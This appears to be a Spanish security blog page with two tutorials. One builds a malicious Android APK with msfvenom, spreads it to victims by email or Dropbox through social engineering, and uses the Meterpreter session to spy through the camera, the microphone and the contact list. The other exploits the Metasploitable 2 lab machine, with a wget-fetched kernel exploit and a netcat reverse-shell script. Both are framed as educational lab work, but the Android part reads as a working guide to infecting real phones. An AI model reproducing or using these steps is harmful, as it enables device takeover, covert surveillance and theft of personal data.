Mostrando entradas con la etiqueta metaesploitable. Mostrar todas las entradas
Mostrando entradas con la etiqueta metaesploitable. Mostrar todas las entradas

sábado, 27 de febrero de 2016

Hackeando dispositivos android con Metasploit

Autores: Juan Velasco y Diego Jurado





Hola hackers! Hoy os traemos una pequeña prueba de concepto de cómo un atacante podría acceder a nuestros datos y dispositivo Android. Para ello realizaremos las pruebas en una simulación mediante el uso de máquinas virtuales.

¡¡Vamos allá!!



Paso 1: Configuración de red



Comprobar conexiones entre los dispositivos


Como trabajaremos en local, puesto que se trata de una prueba de concepto, usaremos dos máquinas virtuales. Una con la distribución Kali Linux 2.0 y otra con una distribución de Android 4.4 que puedes encontrar aquí.


Una vez que tenemos las dos máquinas virtuales encendidas y en funcionamiento, tenemos que ponerlas en modo NAT. Es decir, en red local o interna.




Comprobamos que tenemos conexión entre ambas máquinas realizando un ping entre las dos direcciones IP. Para obtener la dirección IP de nuestro dispositivo Android tenemos que dirigirnos a “Ajustes → Acerca del teléfono → Estado”, teniendo una conexión activa a internet.


Configurar puertos del router


Configuramos puertos del router, abrimos por ejemplo el puerto 5555 y ponemos la interfaz de la máquina virtual que estamos usando, en nuestro caso Kali-Linux.

La máquina virtual Kali tiene la ip (192.168.1.53), tiene que estar en la misma subred que la máquina física desde la cual configuramos el router (192.168.1.33) y deberá estar en modo transparente (Modo Bridged).

Una vez configurados los puertos del router, y la red, procedemos a la creación del malware.



Paso 2: Creación del APK malicioso


Nos vamos a la máquina virtual de Kali Linux, abrimos terminal y ponemos el siguiente comando:

msfvenom -p android/meterpreter/reverse_tcp LHOST=direccion_ip LPORT=puerto R> apkmalicioso.apk

En nuestro caso:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=5555 R> apkmalicioso.apk

Nota: Deberemos poner en LHOST nuestra dirección ip de Kali Linux y en LPORT el puerto que hemos abierto en el router, en nuestro caso el 5555.

Ya tenemos nuestro apk malicioso creado, ahora es importantísimo darle permisos de ejecución desde las propiedades, ya que si no lo hacemos, el usuario no podrá ejecutar e instalar dicha apk.



Ahora toca distribuir nuestro malware vía email, Dropbox o cualquier herramienta de descargas. Ingeniería social.

Como diría Kevin Mitnic



Por otro lado, deberemos abrir metasploit framework y realizar el exploit para escuchar posibles conexiones de nuestras víctimas.


En este caso, lo que haremos será utilizar el exploit multi/handler y el payload reverse_tcp de android para escuchar conexiones ya que serán las víctimas las que se conecten a nosotros.

  1. use multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set lhost direccion_ip_kali
  4. set lport 5555
  5. exploit –j (ponemos el –j para permitir más de una conexión y por tanto para poder abrir varias sesiones al mismo tiempo).

En cuanto la víctima descargue e instale la aplicación, obtendremos una sesión de meterpreter, como podemos ver en la imagen.



Paso 3: Jugando con meterpreter


Ya tenemos la sesión de meterpreter, por lo que tenemos acceso TOTAL al dispositivo móvil.

Es hora de empezar a jugar…

Esta es una lista de algunos comandos que podemos usar:


Podemos mostrar información sobre el sistema:


Listar todos los procesos abiertos:


Acceder a la shell del sistema para navegar por carpetas…


Mostrar las cámaras disponibles


Pudiendo tomar fotografías desde ambas cámaras (delantera y trasera)




Grabar sonidos o activar la webcam



Sacar un listado de contactos o últimas llamadas



Estos son algunos de los comandos que podemos realizar. Es importante saber que todos los archivos se van guardando el carpeta /root de kali linux...




Nota: Los autores de esta prueba de concepto no se hacen responsables del mal uso Be good }:)



domingo, 21 de febrero de 2016

Guia Metasploitable 2: Parte 1

Hola amantes de la seguridad, ésta es la primera entrada, de varias, en las que veremos como explotar las diferentes vulnerabilidades de Metasploitable 2, con el fin de poner en práctica nuestros conocimientos en un entorno seguro.

Para los que no lo conozcáis, Metasploitable 2 es una distribución basada en Ubuntu, configurada intencionadamente con fallos de seguridad y puertos abiertos y asi tener un entorno seguro en el que practicar. Se puede descargar desde el siguiente enlace.

Por otro lado, utilizaremos Kali Linux 2 como máquina atacante.

Una vez descargado Metasploitable 2 y abierto mediante un software de virtualización como Vmware o VirtualBox, procederemos a pasarle un nmap para ver los puertos abiertos.



Como vemos, tenemos bastantes puertos abiertos para ir probando. Los iremos explotando en el mismo orden que aparecen en la captura.


PUERTO 21 VSFTPD  

En el puerto 21 tenemos corriendo vsftpd 2.3.4. Esta versión tiene un backdoor (puerta trasera) que se introdujo en el archivo vsftpd-2.3.4.tar.gz el 30 de Junio de 2011 y se retiró el 3 de Julio del mismo año después de que un usuario avisara al autor.

Para explotarlo, utilizaremos un exploit disponible en metasploit.



Aquí vemos una caputura de la shell obtenida con permisos root.


PUERTO 22 SSH 

 En el puerto 22 está corriendo OpenSSH 4.7p1. Si pasamos un escáner de vulnerabilidades como nessus u openvas, una de las vulnerabilidades nos indica que este servicio tiene los credenciales por defecto, siendo estos la palabra "user" tanto para el usuario como para la contraseña.



Asique aprovechamos ésta vulnerabilidad  para conectarnos. Una vez conectados, vamos a intentar obtener permisos root, para ello nos fijamos en la version del kernel de linux.



Al ser una versión antigua, existen exploits para escalar privilegios localmente. Vamos a usar el siguiente:


Descargamos el exoploit a nuestra máquina, para subirlo a la víctima, utilizaremos el apache. Metemos el archivo descargado en la carpeta /var/www/html/ y arrancamos apache. 


Ahora desde la consola con la conexión ssh, descargamos el exploit con el comando wget y lo compilamos.




El siguiente paso es ver el PID del proceso que utiliza la tarjeta de red para ejecutar nuestro exploit en el mismo proceso.


En este caso es el número 2701. Antes de ejecutar el exploit, vamos a crear un payload que conecte mediante netcat con nuestra máquina Kali cuando ejecutemos el exploit, obteniendo asi nuestra shell con privilegios root.

Creamos un archivo llamado "run" en la misma carpeta que el exploit con el siguiente contenido:

#!/bin/bash
/bin/netcat -e /bin/bash 192.168.0.190 4444

Ponemos la ip de Kali y el puerto que queramos.

Lo siguiente es abrir una nueva terminal en Kali y poner el netcat a la escucha en el mismo puerto que pusimos anteriormente en el payload: nc -l -p 4444.

Ya tenemos todo preparado, solo falta ejecutar el exploit (en el proceso 2701): ./8572 2701


Aquí tenemos una captura de la shell obtenida con privilegios root.


PUERTO 23 TELNET

Este puerto no tiene misterio ninguno puesto que nada mas conectarnos, nos aparece el siguiente mensaje.



Nos dice usuario y contraseña para el login, además el usuario msfadmin tiene permisos root asique no hay nada mas que hacer.



PUERTO 25 SMTP

Esta vez vamos a utilizar un auxiliar de metasploit para obtener nombres de usuario.





No podemos hacer mucho mas en este puerto. 


Hasta aquí la primera entrega, espero os guste y sea de ayuda. Recordar que está hecho solo con fines educativos y en un entorno controlado, no nos hacemos responsables de su mal uso.

Google Analytics